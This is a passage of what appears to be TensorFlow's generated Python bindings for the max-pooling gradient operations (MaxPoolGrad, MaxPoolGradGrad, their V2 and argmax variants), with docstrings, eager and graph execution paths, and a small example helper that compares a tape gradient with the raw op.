orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
Output backprop of shape `[batch, depth, rows, cols, channels]`.
ksize: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The size of the window for each dimension of
the input tensor. Must have `ksize[0] = ksize[4] = 1`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPool3DGradGrad", name, orig_input, orig_output, grad,
"ksize", ksize, "strides", strides, "padding", padding, "data_format",
data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool3d_grad_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPool3DGradGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPool3DGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPool3DGradGrad = tf_export("raw_ops.MaxPool3DGradGrad")(_ops.to_raw_op(max_pool3d_grad_grad))
def max_pool3d_grad_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool3d_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool3d_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(orig_input, orig_output, grad) = _inputs_T
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPool3DGradGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPool3DGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad(orig_input, orig_output, grad, ksize, strides, padding, explicit_paddings=[], data_format="NHWC", name=None):
r"""Computes gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients w.r.t. the output of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGrad", name, orig_input, orig_output, grad, "ksize",
ksize, "strides", strides, "padding", padding, "explicit_paddings",
explicit_paddings, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, explicit_paddings=explicit_paddings,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool_grad' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, explicit_paddings=explicit_paddings,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGrad = tf_export("raw_ops.MaxPoolGrad")(_ops.to_raw_op(max_pool_grad))
def max_pool_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, explicit_paddings, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'max_pool_grad' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ], _dtypes.float32)
(orig_input, orig_output, grad) = _inputs_T
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format, "T",
_attr_T)
_result = _execute.execute(b"MaxPoolGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
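# Illustrative usage sketch (hypothetical helper, not part of the generated
# bindings). The registered gradient of max pooling dispatches to MaxPoolGrad,
# so backpropagating ones through tf.nn.max_pool2d should match calling the
# raw op directly with the same window geometry.
def _example_max_pool_grad():
  import tensorflow as tf
  x = tf.random.normal([1, 4, 4, 2])
  ksize = strides = [1, 2, 2, 1]
  with tf.GradientTape() as tape:
    tape.watch(x)
    y = tf.nn.max_pool2d(x, ksize=ksize, strides=strides, padding="VALID")
  dx_tape = tape.gradient(y, x)
  dx_raw = tf.raw_ops.MaxPoolGrad(orig_input=x, orig_output=y,
                                  grad=tf.ones_like(y), ksize=ksize,
                                  strides=strides, padding="VALID")
  return dx_tape, dx_raw  # expected to be elementwise equal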
def max_pool_grad_grad(orig_input, orig_output, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients of gradients w.r.t. the input of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradGrad", name, orig_input, orig_output, grad, "ksize",
ksize, "strides", strides, "padding", padding, "data_format",
data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_grad_eager_fallback(
orig_input, orig_output, grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradGrad", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradGrad = tf_export("raw_ops.MaxPoolGradGrad")(_ops.to_raw_op(max_pool_grad_grad))
def max_pool_grad_grad_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(orig_input, orig_output, grad) = _inputs_T
_inputs_flat = [orig_input, orig_output, grad]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPoolGradGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_grad_v2(orig_input, orig_output, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients of gradients w.r.t. the input of `max_pool`.
ksize: A `Tensor` of type `int32`.
The size of the window for each dimension of the input tensor.
strides: A `Tensor` of type `int32`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradGradV2", name, orig_input, orig_output, grad, ksize,
strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_grad_v2_eager_fallback(
orig_input, orig_output, grad, ksize, strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradGradV2", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("padding", _op.get_attr("padding"), "data_format",
_op.get_attr("data_format"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradGradV2 = tf_export("raw_ops.MaxPoolGradGradV2")(_ops.to_raw_op(max_pool_grad_grad_v2))
def max_pool_grad_grad_v2_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(orig_input, orig_output, grad) = _inputs_T
ksize = _ops.convert_to_tensor(ksize, _dtypes.int32)
strides = _ops.convert_to_tensor(strides, _dtypes.int32)
_inputs_flat = [orig_input, orig_output, grad, ksize, strides]
_attrs = ("padding", padding, "data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPoolGradGradV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_grad_with_argmax(input, grad, argmax, ksize, strides, padding, include_batch_in_index=False, name=None):
r"""Computes second-order gradients of the maxpooling function.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input.
grad: A `Tensor`. Must have the same type as `input`.
      4-D with shape `[batch, height, width, channels]`. Gradients of gradients
      w.r.t. the input of `max_pool`.
argmax: A `Tensor`. Must be one of the following types: `int32`, `int64`.
The indices of the maximum values chosen for each output of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
include_batch_in_index: An optional `bool`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradGradWithArgmax", name, input, grad, argmax, "ksize",
ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_grad_with_argmax_eager_fallback(
input, grad, argmax, ksize=ksize, strides=strides, padding=padding,
include_batch_in_index=include_batch_in_index, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradGradWithArgmax", input=input, grad=grad, argmax=argmax,
ksize=ksize, strides=strides,
padding=padding,
include_batch_in_index=include_batch_in_index,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"include_batch_in_index",
_op._get_attr_bool("include_batch_in_index"), "Targmax",
_op._get_attr_type("Targmax"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradGradWithArgmax = tf_export("raw_ops.MaxPoolGradGradWithArgmax")(_ops.to_raw_op(max_pool_grad_grad_with_argmax))
def max_pool_grad_grad_with_argmax_eager_fallback(input, grad, argmax, ksize, strides, padding, include_batch_in_index, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_attr_Targmax, (argmax,) = _execute.args_to_matching_eager([argmax], ctx, [_dtypes.int32, _dtypes.int64, ])
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(input, grad) = _inputs_T
_inputs_flat = [input, grad, argmax]
_attrs = ("ksize", ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index, "Targmax", _attr_Targmax,
"T", _attr_T)
_result = _execute.execute(b"MaxPoolGradGradWithArgmax", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_v2(orig_input, orig_output, grad, ksize, strides, padding, data_format="NHWC", name=None):
r"""Computes gradients of the maxpooling function.
Args:
orig_input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input tensor.
orig_output: A `Tensor`. Must have the same type as `orig_input`.
The original output tensor.
grad: A `Tensor`. Must have the same type as `orig_input`.
4-D. Gradients w.r.t. the output of `max_pool`.
ksize: A `Tensor` of type `int32`.
The size of the window for each dimension of the input tensor.
strides: A `Tensor` of type `int32`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `orig_input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradV2", name, orig_input, orig_output, grad, ksize,
strides, "padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_v2_eager_fallback(
orig_input, orig_output, grad, ksize, strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradV2", orig_input=orig_input, orig_output=orig_output,
grad=grad, ksize=ksize, strides=strides,
padding=padding, data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("padding", _op.get_attr("padding"), "data_format",
_op.get_attr("data_format"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradV2 = tf_export("raw_ops.MaxPoolGradV2")(_ops.to_raw_op(max_pool_grad_v2))
def max_pool_grad_v2_eager_fallback(orig_input, orig_output, grad, ksize, strides, padding, data_format, name, ctx):
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_attr_T, _inputs_T = _execute.args_to_matching_eager([orig_input, orig_output, grad], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ], _dtypes.float32)
(orig_input, orig_output, grad) = _inputs_T
ksize = _ops.convert_to_tensor(ksize, _dtypes.int32)
strides = _ops.convert_to_tensor(strides, _dtypes.int32)
_inputs_flat = [orig_input, orig_output, grad, ksize, strides]
_attrs = ("padding", padding, "data_format", data_format, "T", _attr_T)
_result = _execute.execute(b"MaxPoolGradV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"MaxPoolGradV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def max_pool_grad_with_argmax(input, grad, argmax, ksize, strides, padding, include_batch_in_index=False, name=None):
r"""Computes gradients of the maxpooling function.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The original input.
grad: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, height, width, channels]`. Gradients w.r.t. the
output of `max_pool`.
argmax: A `Tensor`. Must be one of the following types: `int32`, `int64`.
The indices of the maximum values chosen for each output of `max_pool`.
ksize: A list of `ints` that has length `>= 4`.
The size of the window for each dimension of the input tensor.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
include_batch_in_index: An optional `bool`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "MaxPoolGradWithArgmax", name, input, grad, argmax, "ksize",
ksize, "strides", strides, "padding", padding,
"include_batch_in_index", include_batch_in_index)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return max_pool_grad_with_argmax_eager_fallback(
input, grad, argmax, ksize=ksize, strides=strides, padding=padding,
include_batch_in_index=include_batch_in_index, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if include_batch_in_index is None:
include_batch_in_index = False
include_batch_in_index = _execute.make_bool(include_batch_in_index, "include_batch_in_index")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"MaxPoolGradWithArgmax", input=input, grad=grad, argmax=argmax,
ksize=ksize, strides=strides,
padding=padding,
include_batch_in_index=include_batch_in_index,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"include_batch_in_index",
_op._get_attr_bool("include_batch_in_index"), "Targmax",
_op._get_attr_type("Targmax"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"MaxPoolGradWithArgmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
MaxPoolGradWithArgmax = tf_export("raw_ops.MaxPoolGradWithArgmax")(_ops.to_raw_op(max_pool_grad_with_argmax))
def max_pool_grad_with_argmax_eager_fallback(input, grad, argmax, ksize, strides, padding, include_batch_in_index, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'max_pool_grad_with_argmax' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
